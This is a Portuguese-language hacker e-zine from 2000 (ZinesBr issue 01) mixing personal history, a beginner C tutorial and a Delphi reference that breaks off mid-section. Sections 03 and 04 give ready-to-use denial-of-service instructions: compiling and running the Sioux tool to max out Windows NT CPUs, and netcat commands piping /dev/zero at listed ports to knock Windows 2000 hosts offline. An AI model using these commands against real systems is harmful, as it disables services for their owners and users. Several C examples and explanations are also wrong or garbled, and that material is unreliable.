		        ...{ a minha, a sua, a nossa zinesbr }...
o............................................................................................o
.   ZZZZZZZZZZ   ::   NNNn    nNN  EEEEEEE   sSSSSSS               bb                        .
.   ZzZ   ZZ          NN NN    NN  EEeeeee  sSSS  sSs              bb                        .
.   Zz   ZZ      ii   NN  NN   NN  EE       sSS                    bbB         rr  rrrrrrr   .
.       ZZ       ii   NN   NN  NN  EEeE       sSS       _______    bbbbbbbbb    rrr   rrr    .
.      ZZ   zZ   ii   NN    NN NN  EE           sSS     @@@@@@@    bb   Bbbb    rr           .
.     ZZ   ZzZ   ii   NN     NNNN  EEeeeee SSs  sSSS               bbB   bbb    rrr          .
.   ZZZZZZZZZz  iiii  NNn     nNN  EEEEEEE  sSSSSSs                bbbbbbbbb   rrrrrr        .
o............................................................................................o
                                                    
                            				
.:x| Zine de Seguranca        |x:.
.:x| Zine Edicao 01           |x:.
.:x| Data: 02/12/2000         |x:.
.:x| #ZiNES-bR - Rede BrasIRC |x:.
.:x| http://www.zines-br.com  |x:.
.:x| zine@zines-br.com        |x:.

:x : Melhor visualizado no WordPad do Windows 				             :x : 
:x : Melhor visualizado no Vi do Linux usando o X-Term (Maximizado)           :x :	
:x : Todo conteudo deste ZiNE sao para fim educativo                          :x :
:x : Nao nos responsabilizamos por usos indevidos                             :x :
                               
                                 ________   ___ 
                                |        | |   |
                                |zines-br|.|com|          
                                |________| |___| 
                                    ||                   
                               .----------.  _/             
                               |__________| (_)  
                          ..........................
_______________________________________________________________________________________
''''''''''''''''''''''''''''''''''''''ZinesBr''''''''''''''''''''''''''''''''''''''''''
      		 				     	
      [SETORES]#  	 				   [AUTORES]$	

<<[00][ Introducao	                          ][   GoToxY    ][00]>>      
<<[01][ Zinesbr e a Historia				  ][   Gotoxy    ][01]>>
<<[02][ Curso de C					  ][   Gotoxy    ][02]>>
<<[03][ Sobrecarga na CPU do WinNT			  ][   Gotoxy    ][03]>>
<<[04][ Sobrecarga na CPU do Win2000              ][   Gotoxy    ][04]>>
<<[05][ Delphi       					  ][   Gotoxy    ][04]>>
<<[06][ Poesia 31337					  ][   Gotoxy    ][05]>>
<<[07][ Tcp Wrappers    				  ][   Gotoxy    ][06]>>
<<[08][ Protegendo seu sistema                    ][   Gotoxy    ][07]>>
<<[09][ Vulnerabilidades				  ][   Gotoxy    ][08]>>	
<<[10][ Escondendo ip no mirc (3 metodos)		  ][   Gotoxy    ][09]>>
<<[11][ Cursinho de Linux - Parte 1			  ][   Gotoxy    ][10]>>
<<[12][ UUDECODE e UUENCODE                       ][   Gotoxy    ][11]>>
<<[13][ Explorando Cgi's           		        ][   Gotoxy    ][12]>>		
<<[14][ Explorando Sendmail's                     ][   Gotoxy    ][14]>>
<<[15][ Seguranca no Windows				  ][   Gotoxy    ][15]>>	
<<[16][ inetd.conf                                ][   Gotoxy    ][16]>>
<<[17][ LKM - (Loadable Kernel Modules)           ][   Gotoxy    ][17]>>
<<[18][ Backdoors com senha                       ][   Gotoxy    ][18]>>
<<[19][ Qual distribuicao devo usar?              ][   Gotoxy    ][19]>>
<<[20][ Registro do Windows                       ][   Gotoxy    ][20]>>
<<[21][ Invadindo uma sistema                     ][   Gotoxy    ][21]>>
<<[22][ Tire suas duvidas                         ][   Gotoxy    ][22]>>
<<[23][ Pheaker (escutas telefonicas)             ][ _0_of_Coll_ ][23]>>                        
<<[24][ Cracker (economize seu money)             ][   Gotoxy    ][24]>>
<<[25][ Proxy, ftp e cpf                          ][ Phozen_Byte ][25]>>
<<[26][ Vulnerabilidade no BitchX                 ][   Gotoxy    ][26]>>
<<[27][ ANARCHY                                   ][   kbytes    ][27]>>   
<<[28][ Palavras finais (importante)              ][   Gotoxy    ][28]>>

_______________________________________________________________________________________
''''''''''''''''''''''''''''''''''''''ZinesBr''''''''''''''''''''''''''''''''''''''''''


SETOR [00]			
==[ Introducao ]==
==[ Por Gotoxy ]==
	

Ae! Finalmente chegamos ao nosso segundo zine! Este foi um pouco mais dificil de fazer 
por varios motivos, nos  quais eu nao  vou  citar. Pois, nao eh importante os  fatores 
que contribuiram  para a dificil projecao desta edicao. Hmm, chega de papo mole. Vamos
as novidades: em primeiro lugar, gostaria de ressaltar dos emails recebidos. Recebemos
varios emails elogiando, outros criticandos e outros dando sugestoes. Queria agradecer
a todos que enviaram emails para nos.Ainda nao tivemos tempo suficiente para responder
mos a todos, mas assim que possivel vamos responder. Em segundo lugar, queria falar de
um assunto um tanto quanto interessante: a quetao do nosso website! Que foi atualizado
com um desing bem melhor do que o do antigo. Nao tenho mais nada a dizer em questao de
novidades. Entao,  vamos mudar de assunto.  O nosso email continua sendo o mesmo, caso 
queira enviar alguma materia, jah sabem neh?! Nao  enviar bobagens,  pois  nao  iremos  
publicar.  Reelembrando: nao nos  responsabilizamos  pelos textos deste  zine.  Apenas 
fazemos isso para aumentar o conhecimento de voces e nao p/ voces  sairem  aniquilando 
servidores por aih.Kiddies que desaparecam daqui! O zine eh para iniciantes e nao para 
313375 (como em todos os textos nash leon fala) =]. Nao  tenho   nada  mais para dizer,  
portanto,aperte 'PageDown' para descer para o primeiro texto. Boa leitura fussadoress!


					    
										     Gotoxy
					                                   gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------- |x:.
					   


SETOR [01]
==[ Zines-br e 'A Historia'  ]==
==[ Por Gotoxy ]==

	Vamos falar um pouco da Zinesbr. Pra comeca, quero deixar bem 
claro a todos que nao somos um cla hacker. Tambem nao somos nenhuma 
especie de hacker,  lammer e  muito  mesmo nerd. Enfim,somos apenas 
amigos  que  gostam de passar  a  todos  um  bukado  de  informacao. 
Saibam que nos fazemos isso somente  com  intuito de deixa-los  bem 
informados na area de informatica. Apesar de tudo, nos fazemos isso 
por diversao. O zine pode ser util para vc, pois por  exemplo, caso 
voce  trabalhe  com  micros  na  area  de seguranca, sabera como os 
"hackers" burlam a seguranca do servidor e outras coisas. Mas, isso 
nao vem ao caso agora. 

O objetivo do Zinesbr nao eh deixar os leitores rebeldes, apesar de 
ensinarmos coisas nao apropriadas. Porem, com fins educativos.  Nao 
cobramos nada pelos zines, mas, se vc quiser nos pagar uma graninha 
... Mas, mudando o assunto do dinheiro, quero lembrar a todos que o
Zinesbr nao eh um cla hacker,portanto, nao mande emails pedindo para
entrar para ele. 

Na edicao 00 do Zinesbr, nos nao colocamos nada sobre, por exemplo: 
como surgiu o zinesbr. Entao, vou falar agora resumidamente de como
tudo comecou... 

-[ A Historia... ]-

Tudo comecou quando eu ganhei meu computador,acho que que foi em 96.
Comecei com joguinhos bobos. Nessa epoca, tinha 10 anos.Nao entendia
muito coisa de computador, soh o basico. Pois  antes de ganhar um pc 
eu fiz um curso de Windows. Depois de um ano, pedi minha  mae  para
assinar  uma  provedora  para mim.  Entrava  soh  final  de  semana, 
no maximo 2 horas, soh para pesquisar trabalhos. Depois de um tempo,
mudei para um outro bairro aqui de BH, cujo nome sera mantido em se-
gredo, pois sou um homem muito procurado =]. Ao passar uns dias, eu
comecei a trocar ideia com uns kras aqui do bairro, todos gente boa,
que ate hj ainda troco. Com eles que comecei a  entrar mais  na net.
Todos tinham icq, exceto alguns. Entao, eles me disseram onde podia
pegar ele e eu peguei e a partir dai conheci muita gente.  Um  cara 
chamado DarkPest que mora perto aqui de casa, foi um dos caras  q me 
ensinaram muita coisa na internet.Ele me passou o esquema de hacking 
e tal e depois disso, eu me interessei sobre isso. Procurava  muitas
paginas  no  www.cade.com.br  sobre  hackers. Logo, aprendi  aquelas 
tecnicas como: ataque de ftp, telnet, etc (q lixo!).Assisti um filme  
chamado: "Hackers, piratas de computador" e fiquei  muito  empolgado 
mesmo.Mas,vamos continuar o assunto de como surgiu o zinesbr. Depois,
jah estava quase fazendo 13 anos e conheci altas  zines  boas, como:
The Death Kinights, RWX, F3, NearZ, etc.Pegava  todas  as  edicoes 
para durante toda a semana eu ler.Lia tudinho mesmo,ate a introducao
que era a parte mais chata eu lia. Aprendi muita coisa com eles, eu
agradeco muito a todos eles pois eles  me  ensinaram bastante  coisa. 
Com 13 aninhos, comecei a fazer pages, e jah programa um pouco em  C
e Visual Basic. Isso, gracas a um amigo chamado Akira. Pois, ele me
deu a base de tudo. Tb com 13 "anus", instalei o linux por pura curi-
osidade, assumo que deu muito trabalho, mas consegui. Durante 3 meses
fiquei com ele. Senti saldade do Windows e instalei ele denovo (hehe).
Peguei muita apostila de Linux para aprender a mecher nele. Mas, nao
adianta saber a teoria se nao tem a pratica. Entao, instalei o Linux
denovo, agora, em outra particao. Entao, fiquei com o Windows e Linux.
Ah! E  ainda  com  13  "anus",  fiz  parte  de  um  cla  chamado PIHC.
Conheci muito  cara  sangue  bom  lah:  Over Flow, 0_of_Coll,  Oregon, 
Tankds, etc. Desculpa os que eu esqueci de citar,pois meu cerebro tem 
limite. Uns dias depois, comecei a entrar no irc. Lah,  eu  conheci o 
Kbytes, d4em0n e Glomer e mais um bukado de gente.  Depois  de  uma
certa data, eu havia me aprofundado em c, shell script, vb  e  outras 
linguagens mais simples, como: html, sscript, entre outras. No comeco
dos meus 14 anos de vida, ja estava sabendo alguma coisa sobre hacking
e queria passar essa experiencia obtida por mim para todos. Nisto, o 
Kbytes, o d4em0n e o Glomer, estava pensando em fundar um cla. Entao,
nos estavamos com ideas diferentes. Eu querendo fundar um zine, e eles
um cla.Entao,falei com eles da minha ideia e eles acabaram concordando.
Chamei o Tankds para fazer parte do nosso zine. Ele aceitou o convite.
Mas, ainda faltava alguma coisa: qual sera o nome do zine? Queria algo
chamativo, entao, acabei escolhendo Zinesbr (ZinesBrasil).Que,qualquer
um que lesse o nome zinesbr saberia que era um zine! Entao foi isso,eu
coloquei um papel para cada um fazer. As pessoas que colaboram com  o 
zine sao: Tankds, d4em0n e Kbytes. Atualmente, eu  com meus 14 anos,
estou fazendo o maximo possivel para passar a pouca informacao obtida
por mim para todos. Agradeco mais uma vez a todos que contribuiram p/
isso. Ae,toda a historia,desde que ganhei meu computador ate o Zinesbr,
foi, resumidamente, contada aqui. Peco desculpas aos meus parceiros de 
aventura q nao tiveram o seu nome citado aqui. 

	[]'s para todos mencionados aqui e p/ todos que eu esqueci de 
mencionar! 

							                  Gotoxy
					                              gotoxy@zines-br.com
.:x| --------------------------------------------------------------------------- |x:.









SETOR [02]
==[ Curso de C ]==
==[ Por Gotoxy ]==


Ae. Vou escrever o basico do basico para os iniciantes em c. 
Vou fazer essa materia de uma forma bem simples e com muitos 
exemplos, pois,aquelas apostilas que voce pega na net ensina 
muita coisa,mas muitos nao entendem. Nao pense que lendo isso 
vc vai se tornar um expert em c.Se quiser se tornar um expert 
em c\c++, pratique, pratique e pratique!

> O C eh uma linguagem de alto nivel
> O C tb compartilha recursos com linguagens de baixo nivel 
> Possui sintaxe bastante estruturada e flexivel
> etc

00 -{Comentarios em C}-
Os comentantarios servem para voce comentar o seu programa, tendeu? 
Vamos a um exemplo abaixo:

main(){
int x;         //foi declarada uma variavel do tipo inteiro
int y;         /* foi declarada outra variavel tb do tipo inteiro */
}

Resumindo:

Aqueles // (dois tracos), eh usado para comentar 
Sintaxe: // comentario

Outra forma de comentar eh usando o /* */ (statements)
Sintaxe: */ comentario */


01 -{Variaveis}-
As variaveis sao utilizadas p/ armazenar e fazer calculos. 
Muitas pessoas ficam com duvida em relacao a variaveis. 
Portanto,trate de enteder agora pois vou explicar muito 
bem explicado.

A sintaxe para se declarar uma variavel eh esta:

tipo nome;
ou
tipo nome = valor_inicial;
ou
tipo nome, nome2;
ou
tipo nome1 = valor_inicial, nome2 = valor_inicial;
ou
tipo nome1 = valor_inicial, nome2;

Onde:
"nome" eh o nome da variavel
"tipo" eh o tipo da variavel 

Os Tipos do C :
	
	int           -> Tipo usado para variaveis numericas.
                       Ocupa 4 bytes (32 bits) na memoria e pode armazenar ate
                       2,147,483,648 valores diferentes.

	char          -> Tipo usado para variaveis caracteres
                       Ocupa 1 byte (8 bits) na memoria e pode armazenar ate
                       256 valores diferentes. 

	long          -> Tipo usado para variaveis numericas maiores que "int"
                       Ocupa 4 bytes 
                       Pode armazenar 2,147,483,648 valores diferentes.

	float         -> Tipo usado para variaveis nao inteiras (ie: 2,5)
                       Ocupa 4 bytes e pode armazenar
                       4294967296.000000 (?) valores diferentes
      
Ha ainda um "sub-tipo" que pode ser usado antes do tipo:
           
	unsigned -> Valores positivos (sem sinal)
        signed -> Valores positivos e negativos 
        extern -> Faz com que a variavel seja "visivel" por todas as funcoes
        static -> Nao perde o valor mesmo quando esta em um bloco de codigo (funcao)


Devemos declaras as variaveis no c antes de usa-las. Tem algumas 
regras na hora de se declarar uma variavel, sao elas:

	o nome da variavel deve comecar com uma letra ou sublinhado (_) e os caracteres 
subsequentes devem ser letras, numeros ou sublinhado (_). 
	o nome de uma variavel nao pode ser igual a uma palavra reservada, nem igual ao 
nome de uma funcao declarada pelo programador, ou pelas bibliotecas do C. Variaveis de 
ate 32 caracteres sao aceitas. 
	Eh bom sempre lembrar que o C eh "case sensitive" e portanto deve-se 
prestar atencao nas maiusculas e minusculas. 

Case sensitive: maiusculas e minusculas fazem diferenca. 
Por exemplo: 
se declararmos uma variavel cujo nome eh soma, ela sera difente 
do que Soma, SOMA, SoMa ou sOmA. E eh bom lembrar, se formos 
usarmos os comandos if e for escritas em maiusculas, o compilador 
nao iria interpreta-los como sendo comandos, e sim, variaveis.

Abaixo, um exemplo de case sensitive:

#include <stdio.h>
main(){
int soma;
int soMA;
int SoMa;
int SOMA;
}

02 -{Funcoes}-
Uma funcao eh um bloco de codigo de programa que pode ser usado 
diversas vezes em sua execucao. O uso de funcoes permite que o 
programa fique mais legivel, mais bem estruturado. Um programa 
em C consiste, no fundo, de varias funcoes colocadas juntas. 

exemplo de funcao:

#include <stdio.h>
aviso(){      
printf("Seu computador esta com virus!");
}
main(){
printf("Aviso:\n");
aviso();
}


Explicando:
A linha #include <stdio.h> diz ao compilador que ele deve incluir
o arquivo-cabecalho stdio.h. Neste arquivo existem definicoes de 
funcoes uteis. Toda vez que voce quiser usar  uma  destas funcoes 
deve-se incluir este comando. O C possui diversos arquivos-cabecalhos

A linha main() define uma funcaoo de nome main. Todos os programas em 
C tem que ter uma funcao main, pois eh esta funcao que serah chamada 
quando o programa  for  executado. O conteudo da funcao eh delimitado 
por chaves { }. O codigo que estiver dentro das chaves sera executado 
sequencialmente quando a funcao for chamada. 


Eh por causa da funcao printf() que devemos incluir o arquivo- cabecalho 
stdio.h.A funcao printf() neste caso ira apenas colocar a string na tela 
do computador.O \n eh uma constante chamada de barra invertida.O n eh de 
"new line" e ele eh interpretado como sendo um retorno de carro. Eh mais
importante observar tb que os comandos do C terminam com ; (ponto e virgula).

Alguns compiladores C podem dar uma mensagem de aviso ("warning") ao compilar
os programas iniciais apresentados aqui.Isto eh pq,por default,toda funcao em
C (inclusive a main()) retorna um inteiro. Quando nao fornecemos este inteiro 
de retorno,o compilador pode mandar uma msg do tipo "Function should return a 
value.". Entao, basta nos usarmos o void. Ele nos permite fazer funcoes q nao 
retornam nada e funcoes que nao tem parametro. 

03 -{Conhecendo comandos e funcoes}-

Void (funcoes q nao retornam nada)
A sintaxe do void eh esta: 
void nome_da_funcao (declaracao_de_parametros); 

Podemos, tb, fazer funcoes que nao tem parametros: 
tipo_de_retorno nome_da_funcao (void); 

ou, ainda, que nao tem parametros e nao retornam nada: 
void nome_da_funcao (void); 

Um exemplo:

#include <stdio.h>
void Mensagem (void);
main ()
{
Mensagem();
printf ("\tDiga de novo:\n");
Mensagem();
}
void Mensagem (void)
{
printf ("100% An4rchy.\n");
}


Com isso voce nao recebera mais o aviso "warning". Se quisermos que a 
funcao retorne algo, devemos usar a declaracao return. Se nao quisermos, 
basta declarar a funcao como tendo tipo-de-retorno void.Devemos lembrar 
agora que a funcao main() eh uma funcao e como tal devemos trata-la. O 
compilador acha que a funcao main() deve retornar um inteiro. Isto pode 
ser interessante se quisermos que o sistema operacional receba um valor 
de retorno da funcao main(). Se assim o quisermos, devemos nos lembrar 
da seguinte convencao: se o programa retornar zero, significa que ele 
terminou normalmente, e, se o programa retornar um valor diferente de 
zero,significa que o programa teve um termino anormal.Se nao estivermos 
interessados neste tipo de coisa, basta declarar a funcao main como 
retornando void. 

---0o0---
Return
Sintaxe: 
return valor_de_retorno; ou return;

Digamos que uma funcao esta sendo executada. Quando se chega a uma 
declaracao return a funcao eh encerrada imediatamente e,se o valor 
de retorno eh informado, a funcao retorna este valor. + importante 
lembrar que o valor de retorno fornecido tem que ser, pelo menos, 
compativel com o tipo de retorno declarado para a funcao. 

Exemplo:
#include <stdio.h> 
int Square (int a) { 
return (a*a); } 
main () 
{ 
int num; 
printf ("Entre com um numero: "); 
scanf ("%d",&num); 
num=Square(num); 
printf ("\n\nO seu quadrado vale: %d\n",num); 
}

Fato importante: se uma funcao retorna um valor voce nao precisa 
aproveitar este valor.Se vc nao fizer nada com o valor de retorno 
de uma funcao ele sera descartado. Por exemplo, a funcao printf() 
retorna um inteiro q nos nunca usamos para nada.Ele eh descartado. 

---0o0---
printf()
biblioteca: stdio.h
Funcao: Permite mostrar dados numericos, caracteres e string na tela.
Ex:

#include <stdio.h>
void main(){
printf("E ae!!");
}

-Caractere-	     -Significado-
\t			tabulacao
\b			emite um bip
\"			imprime aspa dupla
\'			imprime aspa simples
\?			imprime um ponto de interrogacao
\\			imprime uma barra invertida

A funcao printf permite ainda q seja especificado um espaco para que 
seja ingresso o valor de uma variavel.Todos os especificadores devem 
comecar com um simbolo de %

Exemplo:

#include <stdio.h>
void main(){
int x=100;
printf("Meu pai tem %d anos!",x);
}

Entenda: o %d permite q seja impressa a variavel do tipo double chamada idade. 
Depois do sinal %, podem ser colocados alguns modificadores usando a sintaxe:
% [flag] [tamanho] [.precisao] tipo

-[ Veja o significado de cada modificador ]-
[flag]  alinhamento justificado dos dados de saida: (opcional)
-  alinhamento a esquerda
+  mostra numberz sempre com o sinal de + ou - (posiivo ou negativo)
<espaco>  mostra o number negativo com sinal de "-" e o positivo sem sinal
[tamanho]  especifica um tamanho (opcional)
n  Pelo menos n digitos serao impressos (digitos q estiverem faltando serao 
completados por espaco em branco).
0n  Pelo menos n digitos serao impressos (digitos q estiverem faltando serao 
completados por zeros).
[.precisao]  permite especificar a precisao, ou seja, os digitos a direita 
do ponto decimal. caso deixe em branco, o padrao eh de seis digitos reais.
.0  nenhum digito decimal
.n  sao impressos n digitos decimais
Tipo  sua digitacao eh obrigatoria e indica carater de conversao do tipo 
que sera apresentado
d  numeros inteiros decimais
o  numeros inteiros octais
x  numeros inteiros hexadecimais
f  numeros reais de ponto flutuante: [-]dddd.dddd.
e  numeros reais de ponto flutuante com expoente: [-]d.dddde[+/-]ddd.
c  um caracter
s  um string, ou seja, um conjunto de caracteres

---0o0---
scanf()
biblioteca: stdio.h
Funcao: permite q seja efetuada leitura dos valores contidos nas variaveis
Ex:

#include <stdio.h>
void main(){
char nome[30];
printf("Como voce se chama? ");
scanf("%s",&nome);
printf("%s eh um nome horrivel!",nome);
}

Para usa-la, voce tem q seguir a sintaxe:
% [*] [tamanho] tipo

[*]  se vc coloca este indicador, o campo nao sera lido. Caso contrario, 
ele sera lido normalmente. Ele eh util quando vc desejar que um campo de 
um file nao seja armazenado.
[tamanho]  permite especificar o tamanho maximo de caracteres q poderao ser 
lidos no campo 
Tipo  sua digitacao eh obrigatoria e indica carater de conversao do tipo que
sera apresentado
d  numeros inteiros decimal (int)
f  numero real com ponto flutuante (float)
o  numero inteiro octal (int)
x  numeros inteiros hexadecimal (int)
i  numero inteiro decimal de qualquer formato (int)
u  numero inteiro decimal sem sinal (unsignet int)
s  uma string, ou seja, um conjunto de caracteres
c  um caracter

---0o0---
putchar()
biblioteca: stio.h
Funcao: imprime um caracter na saida padrao 
Ex:

#include <stdio.h>
void main(){
putchar('g');

---0o0---
kbhit()
biblioteca: conio.h
Funcao: permite verificar se uma tecla foi pressionada ou nao. 
Esta funcao verifica se existe algum codigo no buffer do teclado. 
Se houver algum valor, ele retorna um number nao nulo e o valor 
armazenado no buffer q pode ser lido com as funcoes getch() e 
getche(). Caso nenhuma tecla seja pressionada, a funcao retorna
0. Ao contrario do getch(), essa funcao nao aguarda q uma tecla 
seja pressionada.

---0o0---
Getch() e Getche()
biblioteca: conio.h
Funcao: permite fazer a leitura dos codigos de teclado.Estes codigos
podem representar teclas de caracteres (a, z, *, !, 8, etc) e de comandos
(ENTER, Ctrl, etc). Ao ser executada, a funcao Getch() aguarda q uma tecla 
seja pressionada, recebe do teclado  o  codigo correspondente e retorna este valor.
Ex:

#include <stdio.h>
#include <conio.h>
void main(){
char letra;
printf("Digite uma letra:");
letra = getche();
printf("\nO caracter digitado por voce foi %c",letra);

---0o0---
Clrscr() e Clreol()
biblioteca: conio.h
funcao: a funcao clrscr limpa a tela e posiciona o cursor na 
primeira linha e primeira coluna da janela (canto superior 
esquerdo da tela. Essa funcao eh equivalente ao comando cls 
do dos. A funcion clreol limpa uma linha desde a posicao do 
cursor ate o seu final, mas nao modifica a posicao do cursor. 

exemplo:

#include <stdio.h>
#include <conio.h>
void main(){
clrscr();
printf("Oi!");
}

---0o0---
Sound(), Delay() e Nosound()
biblioteca: dos.h
funcao: a funcao sound() ativa o alto-falante do PC com frequencia 
especificada. A delay() realiza uma pausa aguardando um intervalo 
de tempo em milisegundos. Ja a funcao nosound() desativa o alto-falante.


04 -{Conhecendo comandos e estruturas}-

---0o0---
Do...while
Permite a execucao de um programa enquanto uma determinada condicao 
for verdadeira.
Exemplo:

do{
puts("Digite um numero positivo: "); // o puts vai imprimir a msg "Digite..." 
scanf("%f",&num);
}while(num <= 0.0);

---0o0---
While
A estrura de repeticao condicional while eh semelhante a estrutura 
do...while. A unica diferenca eh q a condicao eh testada no inicio.
Exemplo:

void imprime{char op)
{
int k=0;
while (k != 50)
{
if(op=='p')
if(k%2!==0) printf("%i",k);
if(op=='i')
if(k%2!=0) printf("%ik);
k++;
}
}

---0o0---
For
O comando for eh muito semelhante a estruturas vistas anteriomente, 
entretando, costuma ser utilizada quando se quer executa um bloco de 
comandos por un numero de vezes.
Exemplo:

#include <stdio.h>
#include <conio.h>
void main(){
int x;
for(x=1;x<=100;x++)
printf("%d ",x);
getch();
}

---0o0---
If...else
Esta estrutura permite executar um entre varios blocos de instrucoes.
O controle de qual bloco sera executado sera dado um uma condicao. O 
if...else pode ser apresentar de modos ligeiramente diferentes. 

Exemplo -{1}-
printf("Digite o number de repeticoes: (maximo 10)");
scanf("%d",&iter);
if(iter > 10)
{
iter = 10;
}

Exemplo -{2}-
if(raiz *raiz > num){
max = raiz;
}else{
min = raiz;
}

Exemplo -{3}-
if(num > 0){
a = b;
}else if(num <0){
a = b + 1;
}else{
a = b - 1;
}

---0o0---
Switch...case
Esta estrutura permite executar um conjunto de instrucoes a 
partir de pontos difentes conforme o resultado de uma expressao
inteira de controle. O resultado desta expressao eh comparado ao 
valor de cada um dos rotulos, e as instrucoes sao executas a partir 
deste rotulo.Esta estrutura eh particulamente util quando existe um 
conjunto de instrucoes em ordem, porem eh possivel iniciar em pontos 
diferentes. 

Exemplo:
Swith(opcao)
{
case 'A':
/* entre com dados */
break;
case 'B':
/* processe os dados */
break;
case 'C':
/* imprima o relatorio */
break;
default:
puts("opcao invalida");
}

---0o0---
Break
Essa instrucao permite encerrar a execucao das instrucoes de 
um laco de repeticao (for, do...while, while) ou de um conjunto 
switch...case. Quando em um laco de repeticao, esta estrutura 
forca a interrupcao do laco indepedentemente da condicao de 
controle.

---0o0---
Continue
Essa instrucao opera de modo semelhante a instrucao break dentro 
de um laco de repeticao. Quando executada, ela pula as instrucoes 
de um laco de repeticao e testa novamente a condicao de controle.


05 -{Finalizando}-

Espero ter passado uma base para voces iniciantes em c. Se voce 
entendeu +/- o que eu escrevi aqui, pegue agora umas apostilas de 
c na net. Eh bom aprender c, pois com ela voce entra em qualquer 
sistema. Eh uma linguagem fantastica, portanto, para se tornar um
expert em c eh necessario voce praticar muito mesmo. Isso foi um 
cursinho bem basico mesmo. No C tem muitas coisas alem do que escrevi 
aqui. Mas, para voces iniciantes aprende-las, eh necessario voce ter a 
base. O q foi escrito aqui foi apenas o inicio.Caso queira se aprofundar
mesmo nesta linguagem, compre alguns livros de C. Existe muitos por ai. 
Eu nao posso dizer um livro bom, pois eu aprendi C na net mesmo, com 
apostilas, foruns, newsgroups, amigos, etc. Entao eh soh isso mesmo, vou
descansar as minhas maos um pouco. flwz!

										      Gotoxy
					                                    gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------- |x:.


		






SETOR [03]
==[ Sobrecarga na CPU do Windows NT ]==
==[ Por Gotoxy   				]==
					  	 
Para isso vamos utilizar uma ferramente conhecida como Sioux. Ao 
executa-lo fornecendo o host e alguns parametros, o volume do 
processamento do NT rapidamente atinge 100%, impedindo que qualquer 
outra tarefa seja realizada. Na maioria dos casos, este tipo de ataque 
pode indisponibilizar a makina, fazendo com que ela nao responda nenhum 
tipo de requesicao.

Para nos travarmos completamente um windows nt, devem estar instalado os seguintes 
pacotes: 

	Service Pack 3 : minimo necessario para a instalacao do iis
	Option Pack 4  : recurso q eh comum em qualquer servidor nt

Voce vai precisar do Sioux, voce pode encontrar ele no seguinte site:
http://packetstorm.securify.com 

Para compilar:

	FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2:
  		gcc -o sioux sioux.c
		
	Solaris 2.5.1:
  		gcc -o sioux sioux.c -lsocket -lnsl

Depois de voce compilar ele, basta voce executa-lo:
[root@localhost]# ./sioux
Vai aparecer na tela como usar, nem precisa explicar aqui como se usa ele, pois se vc
tiver um unico neuronio no seu cerebro, sabera como usa-lo, hehe, nao falei isso para
deixar voce triste. Voce tem que aprender a fucar, pois,  fucando eh que  se  aprende! 

									        Gotoxy
					                                gotoxy@zines-br.com
.:x| ----------------------------------------------------------------------------- |x:.
					    








SETOR [04]
==[ Overload na CPU do Windows 2000 ]==
==[ Por Gotoxy  				  ]==

para vc ver neh, como a microsoft eh uma empresa especializada em programacao. 
bom, nao posso falar nada, pois nao sou capaz de fazer um sistema sozinho. Eu
disse SOZINHO, agora se eu fizer em um grupo, jah eh outra historia... =] mas
agora falando serio, para nos realizarmos o ataque descrito acima, basta voce 
ter o netcat instalado no seu sistema. Voce pode encontra-lo no site: http://
packetstorm.securify.com. 

>>[ Portas vulneraveis: ]<< 
TCP: 7, 9 , 21, 23 e 7778
UDP: 53, 67, 68, 135, 137, 500, 1812, 1813, 2535 e 3456

protocolo tcp, sintaxe:
bash# nc alvo 7 < /dev/zero

protocolo udp, sintaxe: 
bash# nc -u alvo 53 < /dev/zero

com isso vc jah sabe no que resultarah neh?!
bye bye win2000..:)
									        Gotoxy
					                                gotoxy@zines-br.com
.:x| ----------------------------------------------------------------------------- |x:.
					    










SETOR [05]
==[ Delphi     ]==
==[ Por Gotoxy ]==

00. InDiCe

01. Introducao	
02. Bloco de Comandos
03. Lacos de repeticao 
04. Condicionais
05. Strings
06. Conversao de formatos
07. Funcoes aritmeticas
08. Funcoes
09. Caixas de dialogo do Windows
10. Operadores matematicos
11. Operadores logicos
12. Tipos de variaveis
13. Conclusao
						---end---

01. Introducao

E ae!
Abaixo coloquei os comandos e sintaxes mais utilizadados no delphi. 
E saiba que este eh um cursinho basico mesmo. Caso queira se aprofundar, 
procure apostilas na net pois existem muitas espalhadas nela. Ou, caso 
queira aprender delphi com facilidade e sem nenhum trabalho, faca um 
curso =]

						---end---

02. Bloco de comandos

begin...end
este eh o identificado principal de bloco de comandos.. eh usado em functions, procedures
e tb em lacos de repeticao, como FOR e While.

sintaxe: begin comandos end;


try...finally...end
executa comandos especificos entre try e finally.. se um deles falhar, salta diretamente
p/ os comandos da secao finally em vez de gerar uma msg de erro. desta forma ele garante 
q esta sequencia de comandos sera executada.

sintaxe: try comandos finally comandos end;


try...except...end
executa comandos especificos entre try e except..se um deles falhar, salta p/ os comandos
da secao except em vez de gerar uma msg de erro. caso nao haja falha no bloco try, os
comandos do bloco except nao sao executadas.

sintaxe: try comandos except comandos end;

						---end---

03. Lacos de repeticao

For
repete um comando ou um bloco de comandos pela quantidade de vezes especificada.
Sintaxe: for varivael := valor inicial to/downto valor final do comando ou bloco de comandos;

Repeat...Until
executa comandos especificados e depois verifica uma determinada condicao.enquanto a condicao
for falsa, o bloco de comandos sera repetida.
Sintaxe: Repeat comandos Until (condicao);

While
verifica uma condicao e, caso ela nao seja verdadeira, executa o comando ou bloco de comandos,
repetindo-os ate que a condicao torne falsa.
Sintaxe: While (condicao) do comando ou bloco de comandos;

Break
quebra qualquer laco de repeticao e continua a execucao a partir da primeira linha apos o laco.
Sintaxe: Break;

						---end---

04. Condicionais

If
executa um comando ou bloco de comandos caso a condicao especificada seja verdadeira.
Sintaxe: if (condicao) then comando ou bloco de comandos;

Case
teste os valores especificados de uma variavel sequencial e executa um comando ou bloco
de comandos especifico para o valor encontrado.
Sintaxe: Case variavel of valor1 : comando ou bloco de comandos;
	   valor2 ... end;

Else
especifica os comandos a serem executados caso a condicao de um if nao seja verdadeira
ou caso a varivavel testada com case contenha um valor diferente dos citados na lista.
Sintaxe: if (condicao) then comando ou bloco de comandos else comando ou bloco de comandos;
	   case variavel of valor valor1 : comandos ou bloco de comandos; valor2 ...
	   else comandos end;

						---end---
05. Strings

Length
Retorna uma variavel do tipo integer contendo o tamanho de um string.
Sintaxe: Integer := Length(String);

Pos
Procura por uma sequencia de caracteres em outro string e retorna a
posicao da primeira ocorrencia.Caso a sequencia nao seja encontrada,
retorna zero.  

Copy
Copia parte de um String para outro
Sintaxe: String resultante := Copy(String, Inicio,
quantida de caracteres a copiar);

Insert
Insere uma sequencia de caracteres em um outro String
na posicao especificada.
